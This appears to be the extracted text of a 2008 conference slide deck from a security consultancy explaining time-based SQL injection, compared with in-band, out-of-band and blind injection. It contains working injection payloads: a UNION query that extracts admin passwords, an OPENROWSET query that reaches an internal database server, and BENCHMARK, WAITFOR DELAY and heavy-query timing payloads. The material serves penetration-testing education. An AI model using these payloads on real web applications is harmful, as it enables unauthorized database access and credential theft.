Survey
* Your assessment is very important for improving the workof artificial intelligence, which forms the content of this project
* Your assessment is very important for improving the workof artificial intelligence, which forms the content of this project
Microsoft Access wikipedia , lookup
Oracle Database wikipedia , lookup
Microsoft Jet Database Engine wikipedia , lookup
Clusterpoint wikipedia , lookup
Database model wikipedia , lookup
Open Database Connectivity wikipedia , lookup
Microsoft SQL Server wikipedia , lookup
Time based SQL Injection Presented by Muhaimin Dzulfakar 1 © 2008 Security-Assessment.com Who am I Muhaimin Dzulfakar – 90% of kiwis can't pronounce it Known as 'Emmie' Security Consultant – Security-Assessment.com Application and network pen-tester 2 © 2008 Security-Assessment.com Agenda What is time based SQL Injection Differences between blind and time based SQL Injection Time based injection with heavy queries Limitation of time based SQL Injection 3 © 2008 Security-Assessment.com Different types of SQL Injection In Band Injection Out of Band Injection Blind SQL Injection Time Based SQL Injection 4 © 2008 Security-Assessment.com In Band Injection Results are embedded via union select Useful when SQL error message is displayed Fastest way to extract data Ex: http://www.buyviagra.com/buy.php?id=1 UNION ALL null, null, null, null, concat(username,0x3a,admin_password), null from admin/* 5 © 2008 Security-Assessment.com In Band Injection 6 © 2008 Security-Assessment.com Out of Band Injection Use a different communication channel to drill for data Ex: Web Mail application in which data received via SMTP is processed Example of attack: Accessing your neighbour database server with OOB injection Ex: http://www.buyviagra.com/buy.asp?id=1 UNION ALL SELECT a.* FROM OPENROWSET('SQLOLEDB','uid=sa;pwd=; Network=DBMSSOCN;Address=10.1.1.1;timeout=1','SELECT user, pass FROM users') AS a-- 7 © 2008 Security-Assessment.com Out of Band Injection www.buyviagra.com Web server OOB Injection Database B Database A 10.1.1.1 8 © 2008 Security-Assessment.com Blind SQL Injection Application generates custom error message for failed response and normal page for successful response Comparison between true and false response AND 1=1 -> true AND 1=2 -> false Read data byte by byte 9 © 2008 Security-Assessment.com Blind SQL Injection 10 © 2008 Security-Assessment.com Blind SQL Injection 11 © 2008 Security-Assessment.com Time Based SQL Injection Use time based to compare between true and false For true response – time delay is executed For failed response – time delay is not executed Read data byte by byte – exactly the same method with blind injection First example by Chris Anley's paper – More advanced SQL Injection Another example is in David Litchfield paper – Data Mining with SQL Injection and Inference 12 © 2008 Security-Assessment.com Why we need Time Based SQL Injection When the application generates default page for true or false response When the application generates the same custom error page for true or false response Injection is successful but can't be seen by the attacker 13 © 2008 Security-Assessment.com Scenario 1 (blind injection attack) $default=1 if value is not between 1-20 { redirect user to page.php?id=$default } SQL statement 1 AND 1=1 [TRUE] -> default page displayed 1 AND 1=2 [FALSE] -> default page displayed BLIND INJECTION FAILED 14 © 2008 Security-Assessment.com Scenario 1 (time based blind injection attack) $default=1 if value is not between 1-20 { redirect user to page.php?id=$default } SQL statement 1 AND 1=1 [TRUE] -> take 5 seconds to response 1 AND 1=2 [FALSE] -> take 1 second to response SUCCESS TIME BASED BLIND INJECTION 15 © 2008 Security-Assessment.com Scenario 2 (blind injection attack) $values= 1 to 20 if the $values are not between 1-20 { redirect user to error.php } SQL statement 1 AND 1=1 [TRUE] -> error page displayed 1 AND 1=2 [FALSE] -> error page displayed BLIND INJECTION FAILED 16 © 2008 Security-Assessment.com Scenario 2 (time based blind injection attack) $values= 1 to 20 if the $values are not between 1-20 { redirect user to error.php } SQL statement 1 AND 1=1 [TRUE] -> take 5 seconds to response 1 AND 1=2 [FALSE] -> take 1 second to response SUCCESS TIME BASED BLIND INJECTION 17 © 2008 Security-Assessment.com Time Based SQL Injection FALSE = 117ms TRUE = 2478ms 18 © 2008 Security-Assessment.com Spot the different Blind injection (for mysql) 1 AND ASCII(substring((@@version),1,1))<52 if first character of database version is less than 4, it is true if first character of database version is 4 or more, it is false query position operator char 19 © 2008 Security-Assessment.com Spot the different Time Based Blind injection (for MySQL) 1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@version),1,1)),0)<52),BENCHMARK(900000,SHA1(1)),1)) if first character of database version is less than 4, execute BENCHMARK if first character of database version is not less than 4 , return 1 char count time query operator time delay position 20 © 2008 Security-Assessment.com Time Based Injection on MSSQL Time based injection (MSSQL) 1 AND if not(substring((select \@\@version),25,1) < 52) waitfor delay '0:0:9'-- if the first character less than 4, execute waitfor delay query time delay position operator char 21 © 2008 Security-Assessment.com Other Databases Oracle (without PL/SQL support) MS Access, DB2 do not have delay functions Time Based Injection is possible by using heavy queries Chema Alonso and Jose Prada talked about this in Microsoft Security MVP Article and Defcon 2008 2 types of conditions in 'where clause' Light Condition first Heavy Condition first Select A from B where ConditionA and ConditionB 22 © 2008 Security-Assessment.com Heavy condition first Heavy condition 100sec Light Condition 10sec Heavy & Light Condition Result True False False 110 Seconds True True True 110 Seconds False - False 100 Seconds Result from Alonso research 23 © 2008 Security-Assessment.com Light condition first Light condition 10sec Heavy Condition 100sec Heavy & Light Condition Result True False False 110 Seconds True True True 110 Seconds False - False 10Secon ds Result from Alonso research 24 © 2008 Security-Assessment.com Heavies Queries Oracle evaluates the conditions from left to right MS Access evaluates the conditions from right to left MSSQL evaluates light condition first Table name needs to be known Default table can be used for testing MSSQL – sysussers MySQL – information_schema.colums Oracle - all_users 25 © 2008 Security-Assessment.com Heavies Queries Example of time based injection using heavy queries on MSSQL (light condition evaluates first) 1 AND (select count(*) FROM sysusers as sys1, sys2, sysusers as sys2, sysusers as sys3, sysusers as sys4, sysusers as sys5, sysusers as sys6, sysusers as sys7, sysusers as sys8)> 0 AND 52 < (select top 1 ASCII(substring(name,1,1)) from sysusers) Suitable for databases that do not support time delay functions Ex: Oracle and MS Access heavy query light query 26 © 2008 Security-Assessment.com Limitation Results are not efficient during busy times How to get efficient results ? Review the ipid checking (hping3) Perform the test at 3am Perform the test during Xmas For heavy queries, time delay depends on how much data is stored in database The more data, more efficient are the result 27 © 2008 Security-Assessment.com Demo 28 © 2008 Security-Assessment.com Question ? [email protected] 29 © 2008 Security-Assessment.com